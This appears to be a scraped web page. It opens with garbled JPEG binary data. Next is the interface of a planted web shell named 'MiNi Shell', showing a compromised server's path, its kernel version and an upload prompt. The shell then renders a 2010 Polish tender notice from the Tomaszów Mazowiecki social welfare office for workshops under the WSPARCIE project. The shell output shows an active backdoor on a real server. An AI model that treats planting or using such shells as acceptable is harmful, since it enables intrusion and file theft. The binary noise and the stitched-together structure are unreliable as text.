JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100219/34679-N-2010.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Przeprowadzenie warsztatów dla beneficjentów ostatecznych projektu WSPARCIE</b><br>
<b>Numer ogłoszenia: 34679 - 2010; data zamieszczenia: 19.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim , ul. Cekanowska 5, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 044 7237353, faks 044 7233489.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie warsztatów dla beneficjentów ostatecznych projektu WSPARCIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia składa się z 3 zakresów, które realizował będzie samodzielnie  jeden Wykonawca.
1.1 Zakres 1
Przedmiotem zamówienia jest przeprowadzenie Treningu Kompetencji Społecznych dla 110 beneficjentów ostatecznych projektu Wsparcie.
Warsztaty prowadzone będą dla 8 grup zgodnie z podanym poniżej harmonogramem:
Grupa I 	11.03.2010r. - 19.03.2010r.,  w godz. 8.00-14.00
Grupa II	18.03.2010r. - 26.03.2010r., w godz. 8.30-14.30
Grupa III	12.04.2010r. -20.04.2010r., w godz. 8.00-14.00
Grupa IV	19.04.2010r. - 27.04.2010r., w godz. 8.30-14.30
Grupa V	04.05.2010r. - 12.05.2010r., w godz. 8.00-14.00
Grupa VI	25.05.2010r. - 02.06.2010r., w godz. 8.30-14.30
Grupa VII	02.06.2010r. - 11.06.2010r., w godz. 8.00-14.00
Grupa VIII 17.06.2010r. - 25.06.2010r., w godz. 8.30-14.30
Warsztaty dla w/w grup powinny trwać 7 dni roboczych po 6 godzin (1 godzina = 60 minut), łącznie 336 godzin dla wszystkich beneficjentów ostatecznych, zgodnie z podaną poniżej tematyką:
Dzień pierwszy: INTEGRACJA I BUDOWANIE BEZPIECZEŃSTWA W GRUPIE 
KOMPETENCJE SPOŁECZNE W ŻYCIU ZAWODOWYM:
Warsztat powinien obejmować między innymi:
Budowanie kontaktu, Poznanie się członków grupy, Budowanie zaufania, Trening otwartości oraz informacje: Co to są kompetencje społeczne?, Jakie są rodzaje kompetencji społecznych?, Jakie kompetencje społeczne są potrzebne w pracy?
Dzień drugi: KOMUNIKACJA INTERPERSONALNA:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Co to jest komunikacja jedno i dwu-kierunkowa?, Jak powinna wyglądać wzorcowa rozmowa?, Jakie istnieją bariery w skutecznym komunikowaniu się?, Jakie są różnice między komunikacją werbalną i niewerbalną?
Dzień trzeci: TRENING ASERTYWNEGO ZACHOWANIA W ŻYCIU  ZAWODOWYM:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Co to  jest asertywność?, Co odróżnia zachowania asertywne od uległych i agresywnych?, Dlaczego warto być asertywnym?, Czy jestem asertywny?, Jak bronić swoich praw?, Jak radzić sobie w sytuacjach jak ktoś nas poniża?
Dzień czwarty: ZARZĄDZANIE STRESEM:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Co to jest stres?, Jakie czynniki wywołują stres?, Jakie są rodzaje stresu?, Jaki jest mój styl radzenia sobie ze stresem?, Jak radzić sobie z napięciem w sytuacji stresującej? oraz możliwość zapoznania się z technikami radzenia sobie ze stresem.
Dzień piąty: TRENING UMIEJĘTNOŚCI NEGOCJACYJNYCH W RELACJACH, RADZENIE SOBIE Z KONFLIKTEM:	
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Jakie są rodzaje konfliktów?, Jakie są techniki rozwiązywania konfliktów?, Czym są negocjacje?, Jakie są style negocjowania? Jaki jest mój styl negocjowania? Na czym polegają negocjacje integracyjne?, Jak się przygotować do negocjacji? Jak negocjować?
Dzień szósty: AUTOPREZENTACJA,  ZASOBY OSOBISTE JAKO KAPITAŁ
NA RYNKU PRACY:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Co to są zasoby osobiste?, Jakie są moje zasoby osobiste?, Jakie moje zalety dostrzegane są przez innych? Jak rozwijam swoje zasoby? Jakie są techniki wpływu społecznego? oraz umożliwić trening prezentacji własnych zasobów.
Dzień siódmy: TRENING MOTYWACJI, PLANOWANIA SWOJEJ PRZYSZŁOŚCI ZAWODOWEJ:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Czym jest motywacja?, Co nas motywuje?, Jak radzić sobie w trudnych sytuacjach?, Jakie jest moje poczucie własnej wartości?, Co chcę osiągnąć w swoim życiu zawodowym?, Jak planować swoja przyszłość zawodową i zarządzać czasem?
Rezultaty: rozwinięcie technik poprawiających komunikację między ludźmi i pokonywanie barier w komunikacji, wytwarzanie asertywnej postawy w relacjach z ludźmi, poznanie symptomów stresu i skutecznych sposobów radzenia sobie z nim, poznanie teorii wpływu społecznego i jej zastosowania w praktyce, podniesienie zaufania do własnych możliwości, przygotowanie do radzenia sobie w trudnych sytuacjach społecznych.
1.2 Zakres 2
Przedmiotem zamówienia jest przygotowanie i przeprowadzenie warsztatów z zakresu Treningu Rozwoju Osobistego dla 27 beneficjentów ostatecznych projektu Wsparcie. Warsztaty prowadzone będą dla 2 grup, zgodnie z podanym poniżej harmonogramem:
Grupa I 	12.07.2010r. - 16.07.2010r., w godz. 9.00-14.00
Grupa II	02.08.2010r. - 06.08. 2010r., w godz. 9.00-14.00
Warsztaty dla w/w grup powinny trwać 5 dni roboczych po 5 godzin (1 godzina = 60 min) zgodnie z podaną poniżej tematyką:
Dzień pierwszy: INTEGRACJA I BUDOWANIE BEZPIECZEŃSTWA W GRUPIE, SAMOPOZNANIE:
Warsztat powinien obejmować między innymi:
Budowanie zaufania, Tworzenie kontraktu, Poznanie się uczestników, Analiza zasobów osobistych i pobudzenie motywacji wewnętrznej.
Dzień drugi: TRENING KREATYWNOŚCI:
Warsztat powinien obejmować między innymi:
Istota kreatywności i twórczego myślenia, Kreatywność w aspekcie indywidualnym, Stymulowanie indywidualnej kreatywności.
Dzień trzeci: ROZWIĄZYWANIE PROBLEMÓW I PODEJMOWANIE DECYZJI:
Behawioralne aspekty podejmowania decyzji, Grupowe a indywidualne podejmowanie decyzji, Metody i techniki wspomagające rozwiązywanie problemów, Wybrane metody rozwiązywania problemów.
Dzień czwarty: INTELIGENCJA EMOCJONALNA:
Mechanizmy powstawania uczuć i emocji, Emocje pozytywne i negatywne i ich wpływ na tworzenie się relacji między ludźmi, Nauka języka emocji, Techniki ułatwiające dokonanie zmiany uczuć i emocji.
Dzień piąty: INTELIGENCJA EMOCJONALNA:
Mechanizm powstawania emocji i tzw. zarażenia emocjonalnego, Matryca kontroli emocjonalnej, Spirala emocji, Pozytywne przywództwo - doskonalenie inteligencji emocjonalnej.
Rezultaty: zwiększenie poziomu samowiedzy, wzrost kreatywności, poszerzenie umiejętności rozwiązywania problemów, zdobycie wiedzy na temat podejmowania decyzji, poszerzenie umiejętności rozpoznawania emocji, zdobycie umiejętności zarządzania emocjami.
1.3 Zakres 3
Przedmiotem zamówienia jest przygotowanie i przeprowadzenie warsztatów z zakresu Szkoły dla Rodziców dla 40 beneficjentów ostatecznych projektu Wsparcie.
Warsztaty prowadzone będą dla 2 grup, zgodnie z podanym poniżej harmonogramem:
Grupa I 	30.08.2010r. - 03.09.2010r.,  w godz. 8.30-14.30
Grupa II	06.09.2010r. - 10.09.2010r., w godz. 8.30-14.30
Warsztaty dla w/w grup powinny trwać 5 dni roboczych po 6 godzin (1 godzina = 60 min) zgodnie z podaną poniżej tematyką:
Dzień pierwszy: INTEGRACJA - PODSTAWY PSYCHOLOGII ROZWOJOWEJ:
Rozwój intelektualny, emocjonalny i społeczny dziecka. Rozpoznawanie uzdolnień, talentów i rezerw. Co można zrobić, by stymulować rozwój?
Dzień drugi: JAK ROZMAWIAĆ Z DZIECKIEM:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Co zrobić, żeby dziecko chciało z nami rozmawiać? Sposób rozmowy a poziom rozwoju dziecka? Jak rozmawiać z dzieckiem na tematy trudne?
Dzień trzeci: TRUDNE DZIECI:
Warsztat powinien dać możliwość beneficjentom uzyskania odpowiedzi na następujące pytania: Skąd biorą się problemy wychowawcze? Identyfikowanie źródeł problemu? Reagowanie na bunt i sprzeciw? Jak nie zaszkodzić próbą pomocy? Wyznaczanie granic.
Dzień czwarty: DZIECKO W OBLICZU ZAGRAŻEŃ: 
Najważniejsze zagrożenia dla bezpieczeństwa dziecka. Jak przeciwdziałać potencjalnym zagrożeniom? Jak zadbać o bezpieczeństwo dziecka w sieci?
Dzień piąty: WYKORZYSTANIE FILMÓW W WYCHOWANIU DZIECI:
Modelowanie zachowań. Wspomaganie rozwoju moralnego. Wspomaganie rozwoju emocjonalnego. 
Rezultaty: zdobycie wiedzy na temat psychologicznego rozwoju dziecka, zdobycie umiejętności skutecznej komunikacji z dzieckiem, zdobycie umiejętności radzenia sobie z trudnymi dziećmi, zdobycie wiedzy na temat zagrożeń dotyczących dzieci i umiejętności przeciwdziałania im, zdobycie umiejętności posługiwania się filmem w wychowywaniu dzieci.
2. Każdy z uczestników otrzyma od wykonawcy najpóźniej w dniu rozpoczęcia warsztatów materiały warsztatowe, o ilości stron: dla grupy Trening Kompetencji Społecznych liczba stron materiałów warsztatowych minimum 50 stron (maksymalnie 100 stron); dla grupy Trening Rozwoju Osobistego liczba stron materiałów warsztatowych minimum 30 stron (maksymalnie 100 stron); dla grupy Szkoła dla Rodziców liczba stron materiałów warsztatowych minimum 30 stron (maksymalnie 100 stron). Wykonawca winien sporządzić protokół przekazania w/w materiałów, a każdy uczestnik warsztatów potwierdza odebranie materiałów własnoręcznym podpisem. Wykonawca dostarczy protokół do siedziby zamawiającego w terminie 5 dni po wydaniu materiałów.
2.1 Wszystkie materiały warsztatowe winny być oznaczone zgodnie z: Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki wydane przez Departament Zarządzania Europejskim Funduszem Społecznym, Ministerstwo Rozwoju Regionalnego, Instytucja Zarządzająca Programem Operacyjnym Kapitał Ludzki, Warszawa, 4 luty 2009 r.  Powyższe wytyczne oraz wzory logotypów dostępne są na stronie: http://www.wup.lodz.pl/
2.2 Warsztaty powinny być prowadzone przez co najmniej dwóch psychologów posiadających wykształcenie wyższe. W przypadku choroby lub nieobecności psychologa wykonawca powinien zapewnić zastępstwo w prowadzeniu warsztatów przez innego psychologa, który posiada odpowiednie wykształcenie.
2.3 Wykonawca zobowiązany jest prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć oraz listę obecności i przekazać zamawiającemu kopię dziennika zajęć w terminie 5 dni po zakończeniu warsztatów. 
2.4 Wykonawca zobowiązany jest prowadzić dokumentację dotyczącą prowadzenia warsztatów, w tym: prowadzenie list obecności, rejestrowanie i niezwłoczne zgłaszanie zamawiającemu w danym dniu, najpóźniej w następnym dniu o każdej nieobecności uczestnika na warsztatach lub rezygnacji z uczestnictwa w warsztatach w trakcie jego trwania - pod rygorem odmowy zapłaty za prowadzone warsztaty tych osób. Prowadzenie listy obecności na zajęciach polega na tym, że każdy uczestnik warsztatów potwierdza obecność na zajęciach własnoręcznym podpisem. Wykonawca winien dostarczyć jej kopię do siedziby zamawiającego raz na dwa tygodnie oraz niezwłocznie po zakończeniu szkolenia.
2.5 Wykonawca zobowiązany jest do przeprowadzenia ankiety ewaluacyjnej po zakończeniu warsztatów. Wykonawca zobowiązany jest w ciągu 3 dni po zakończeniu warsztatów dostarczyć do siedziby zamawiającego ankietę ewaluacyjną. 
2.6 Wykonawca zobowiązany jest do opracowania wyników uzyskanych podczas badania prowadzonego ankietą ewaluacyjną i składania Koordynatorowi projektu miesięcznych sprawozdań - na koniec każdego miesiąca - oraz sprawozdania końcowego z przebiegu warsztatów zawierającego w/w opracowanie wyników w terminie 7 dni od zakończenia warsztatów. 
2.7 Zamawiający wymaga aby warsztaty prowadzone były w Tomaszowie Mazowieckim w lokalu przy ul. Farbiarskiej 20. Lokal w godzinach realizacji zamówienia zapewnia zamawiający.
2.8 Do zadań Wykonawcy należy również przygotowanie:
- Materiałów z zakresu warsztatów zgodnie z podaną wyżej tematyką w formie materiałów warsztatowych dla wszystkich beneficjentów. Zamawiający udostępni Wykonawcy materiały biurowe w formie papieru ksero oraz skoroszytów plastikowych lub kompletu okładek do bindowania oraz materiały do prowadzenia warsztatów.
- Scenariuszy poszczególnych warsztatów zgodnie z podaną wyżej tematyką.
- Prezentacji multimedialnej na poszczególne warsztaty zgodnie z podaną wyżej tematyką i wykorzystanie jej w trakcie prowadzenia zajęć. Sprzęt do przeprowadzenia prezentacji udostępni zamawiający.
- Scenariusz poszczególnych warsztatów i prezentacja multimedialna stanowi załącznik do oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.12.12.70-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 11.03.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, tj. złożą oświadczenie w przedmiocie posiadania uprawnień do wykonywania działalności lub czynności będących przedmiotem zamówienia - warunek 1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia tj. przedstawią oświadczenie potwierdzające sytuację ekonomiczną i finansową zapewniającą należyte wykonanie zamówienia - warunek 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym - warunek 3</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia tj. minimum 2 osoby z wykształceniem wyższym psychologicznym - warunek 3</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. przedstawią oświadczenie potwierdzające sytuację ekonomiczną i finansową zapewniającą należyte wykonanie zamówienia - warunek 4</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- oświadczenie, że posiada uprawnienia do wykonywania określonej działalności lub czynności; 
- oświadczenie stanowiące załącznik do oferty - zgodnie z art. 22 ust. 1 pkt. 1- 4 ustawy Prawo zamówień publicznych;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> htpp://mopstomaszow.nbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim ul. Cekanowska 5 97-200 Tomaszów Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2010 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Tomaszowie Mazowieckim ul. Cekanowska 5 97-200 Tomaszów Mazowiecki, pokój nr 16 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Gmina Miasto Tomaszów Mazowiecki - Miejski Ośrodek Pomocy Społecznej (MOPS) w Tomaszowie Mazowieckim, jest realizatorem projektu Wsparcie w ramach Poddziałania 7.1.1 Rozwój i upowszechnianie  aktywnej integracji przez ośrodki pomocy społecznej Programu Operacyjnego Kapitał Ludzki. Projekt Wsparcie jest współfinansowany 	przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com